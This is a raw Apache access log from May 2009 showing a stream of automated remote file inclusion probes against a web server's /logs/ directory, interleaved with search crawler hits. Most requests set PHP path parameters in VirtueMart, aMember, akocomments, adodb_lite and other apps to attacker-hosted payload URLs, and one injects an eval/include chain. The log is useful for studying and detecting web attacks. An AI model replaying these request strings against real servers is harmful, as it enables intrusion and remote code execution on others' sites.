88.84.128.40 - - [12/May/2009:22:06:10 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:22:06:11 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:22:08:19 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:22:08:20 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
201.92.221.127 - - [12/May/2009:22:08:50 -0500] "GET /logs/access_log.1234915200http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
201.92.221.127 - - [12/May/2009:22:08:52 -0500] "GET /logs/access_log.1230076800http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
88.191.103.144 - - [12/May/2009:22:09:00 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:22:09:01 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
201.92.221.127 - - [12/May/2009:22:09:02 -0500] "GET /logs/access_log.1230076800http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
201.92.221.127 - - [12/May/2009:22:09:03 -0500] "GET /logs/access_log.1234915200http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
217.18.76.16 - - [12/May/2009:22:09:14 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:22:09:14 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
220.181.7.97 - - [12/May/2009:22:09:54 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
69.172.126.16 - - [12/May/2009:22:09:54 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:22:09:54 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
88.191.103.144 - - [12/May/2009:22:09:57 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:22:09:57 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.825"
87.106.135.14 - - [12/May/2009:22:10:18 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [12/May/2009:22:10:19 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
201.92.221.127 - - [12/May/2009:22:10:51 -0500] "GET /logs/access_log.1230076800http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
201.92.221.127 - - [12/May/2009:22:10:51 -0500] "GET /logs/access_log.1234915200http://obrigadomeudeus.webcindario.com/inbox.txt? HTTP/1.1" 404 357 "-""Mozilla/3.0 (compatible; Indy Library)"
217.18.76.16 - - [12/May/2009:22:11:07 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:22:11:08 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
69.172.126.16 - - [12/May/2009:22:11:51 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:22:11:52 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
87.106.135.14 - - [12/May/2009:22:12:55 -0500] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
87.106.135.14 - - [12/May/2009:22:12:55 -0500] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
88.84.128.40 - - [12/May/2009:22:15:14 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:22:15:14 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
85.214.72.235 - - [12/May/2009:22:17:28 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
85.214.72.235 - - [12/May/2009:22:17:28 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kortech.cn/bbs//skin/zero_vote/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
221.139.1.251 - - [12/May/2009:22:21:28 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
221.139.1.251 - - [12/May/2009:22:21:44 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
221.139.1.251 - - [12/May/2009:22:21:44 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.106.135.14 - - [12/May/2009:22:23:21 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
87.106.135.14 - - [12/May/2009:22:23:21 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
110.45.146.146 - - [12/May/2009:22:23:49 -0500] "GET /logs//blend_data/blend_common.php?phpbb_root_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
110.45.146.146 - - [12/May/2009:22:23:49 -0500] "GET //blend_data/blend_common.php?phpbb_root_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
110.45.146.146 - - [12/May/2009:22:23:49 -0500] "GET /logs/access_log.1238112000//blend_data/blend_common.php?phpbb_root_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
88.191.103.144 - - [12/May/2009:22:23:49 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.825"
88.191.103.144 - - [12/May/2009:22:23:50 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.825"
221.139.1.251 - - [12/May/2009:22:23:54 -0500] "GET /logs/access_log.1239148800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
217.18.76.16 - - [12/May/2009:22:24:20 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
217.18.76.16 - - [12/May/2009:22:24:20 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
218.185.20.88 - - [12/May/2009:22:25:24 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:22:25:24 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:22:25:24 -0500] "GET /logs/access_log.1232064000//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:22:25:51 -0500] "GET /logs/access_log.1232323200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
66.249.67.180 - - [12/May/2009:22:25:56 -0500] "GET /logs/access_log.1186444800 HTTP/1.1" 200 13081 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
145.253.245.211 - - [12/May/2009:22:26:11 -0500] "GET /logs/index.php?option=com_mkpostman&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
145.253.245.211 - - [12/May/2009:22:26:11 -0500] "GET /index.php?option=com_mkpostman&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
216.117.191.71 - - [12/May/2009:22:28:52 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.65"
216.117.191.71 - - [12/May/2009:22:28:52 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.65"
88.84.128.40 - - [12/May/2009:22:30:36 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:22:30:36 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
66.249.67.180 - - [12/May/2009:22:31:12 -0500] "GET /logs/access_log.1190851200 HTTP/1.1" 200 2262 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.75.4.169 - - [12/May/2009:22:32:31 -0500] "GET /logs/index.php?option=com_mkpostman&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
202.75.4.169 - - [12/May/2009:22:32:31 -0500] "GET /index.php?option=com_mkpostman&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
212.150.52.114 - - [12/May/2009:22:32:40 -0500] "GET /logs/home.php?index=http://biquad.com.br/catalog/copyright.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
212.150.52.114 - - [12/May/2009:22:32:40 -0500] "GET /home.php?index=http://biquad.com.br/catalog/copyright.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
212.150.52.114 - - [12/May/2009:22:32:40 -0500] "GET /logs/access_log.1238025600/home.php?index=http://biquad.com.br/catalog/copyright.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
212.150.52.114 - - [12/May/2009:22:33:01 -0500] "GET /logs/access_log.1239667200/home.php?index=http://biquad.com.br/catalog/copyright.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:22:35:32 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:22:35:32 -0500] "GET /logs/access_log.1232064000//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:22:35:32 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
218.185.20.88 - - [12/May/2009:22:35:45 -0500] "GET /logs/access_log.1232323200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
66.249.67.180 - - [12/May/2009:22:36:29 -0500] "GET /logs/access_log.1128988800 HTTP/1.1" 200 2271 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
110.45.144.107 - - [12/May/2009:22:40:49 -0500] "GET /logs//blend_data/blend_common.php?phpbb_root_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
110.45.144.107 - - [12/May/2009:22:40:49 -0500] "GET //blend_data/blend_common.php?phpbb_root_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
110.45.144.107 - - [12/May/2009:22:40:49 -0500] "GET /logs/access_log.1238112000//blend_data/blend_common.php?phpbb_root_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
69.172.126.16 - - [12/May/2009:22:43:58 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.803"
69.172.126.16 - - [12/May/2009:22:43:58 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
202.71.102.239 - - [12/May/2009:22:49:18 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
202.71.102.239 - - [12/May/2009:22:49:18 -0500] "GET /logs/access_log.1233705600//include/bbs.lib.inc.php?site_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
202.71.102.239 - - [12/May/2009:22:49:18 -0500] "GET //include/bbs.lib.inc.php?site_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
202.71.102.239 - - [12/May/2009:22:49:50 -0500] "GET /logs/access_log.1227571200//include/bbs.lib.inc.php?site_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
65.55.106.243 - - [12/May/2009:22:50:18 -0500] "GET /logs/access_log.1205539200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
196.40.83.75 - - [12/May/2009:22:55:08 -0500] "GET /logs//?custompluginfile[]=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 200 189195 "-""libwww-perl/5.810"
196.40.83.75 - - [12/May/2009:22:55:08 -0500] "GET //?custompluginfile[]=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 200 3245 "-""libwww-perl/5.810"
208.43.127.247 - - [12/May/2009:22:55:31 -0500] "GET /logs/access_log.1237766400 HTTP/1.1" 200 324030 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1; SV1)"
202.71.102.239 - - [12/May/2009:22:56:20 -0500] "GET /logs/access_log.1229126400//errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
202.71.102.239 - - [12/May/2009:22:56:21 -0500] "GET //errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
202.71.102.239 - - [12/May/2009:22:56:21 -0500] "GET /logs//errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
202.71.102.239 - - [12/May/2009:22:56:22 -0500] "GET /logs/access_log.1225843200//errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.249.67.180 - - [12/May/2009:22:57:41 -0500] "GET /logs/access_log.1150329600 HTTP/1.1" 200 969 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
202.71.102.239 - - [12/May/2009:22:57:46 -0500] "GET /logs/access_log.1227916800//errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
202.71.102.239 - - [12/May/2009:22:57:47 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
66.219.97.207 - - [12/May/2009:22:58:15 -0500] "GET /logs/errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
66.219.97.207 - - [12/May/2009:22:58:15 -0500] "GET /errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
202.71.102.239 - - [12/May/2009:22:58:24 -0500] "GET //include/write.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
202.71.102.239 - - [12/May/2009:22:58:34 -0500] "GET /logs/access_log.1237766400//components/com_flyspray/startdown.php?file=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
202.71.102.239 - - [12/May/2009:22:58:34 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
202.71.102.239 - - [12/May/2009:22:58:35 -0500] "GET //components/com_flyspray/startdown.php?file=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
202.71.102.239 - - [12/May/2009:22:58:56 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
202.71.102.239 - - [12/May/2009:22:58:56 -0500] "GET /logs//include/write.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
202.71.102.239 - - [12/May/2009:22:59:10 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
66.219.97.207 - - [12/May/2009:22:59:28 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
66.219.97.207 - - [12/May/2009:22:59:28 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
88.84.128.40 - - [12/May/2009:22:59:55 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:22:59:55 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
196.40.83.75 - - [12/May/2009:23:01:18 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.810"
196.40.83.75 - - [12/May/2009:23:01:18 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
148.233.159.58 - - [12/May/2009:23:01:43 -0500] "GET /logs/access_log.1228262400 HTTP/1.1" 200 12042 "http://search.msn.co.uk/results.aspx?srch=105&FORM=AS5&q=ok""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; StumbleUpon.com 1.814; Alexa Toolbar)"
88.84.128.40 - - [12/May/2009:23:02:52 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.803"
88.84.128.40 - - [12/May/2009:23:02:52 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.803"
66.249.67.180 - - [12/May/2009:23:02:57 -0500] "GET /logs/access_log.1172448000 HTTP/1.1" 200 4754 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.219.97.207 - - [12/May/2009:23:03:18 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
66.219.97.207 - - [12/May/2009:23:03:19 -0500] "GET //include/admin.lib.inc.php?site_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
202.71.102.239 - - [12/May/2009:23:05:19 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
202.71.102.239 - - [12/May/2009:23:05:19 -0500] "GET /logs/access_log.1238371200/e404.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
202.71.102.239 - - [12/May/2009:23:05:20 -0500] "GET /logs/access_log.1238889600/e404.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
202.71.102.239 - - [12/May/2009:23:05:20 -0500] "GET /e404.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
202.71.102.239 - - [12/May/2009:23:06:53 -0500] "GET /logs/access_log.1239667200/e404.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
66.249.67.180 - - [12/May/2009:23:08:13 -0500] "GET /logs/access_log.1194652800 HTTP/1.1" 200 3909 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.117.191.71 - - [12/May/2009:23:08:39 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.65"
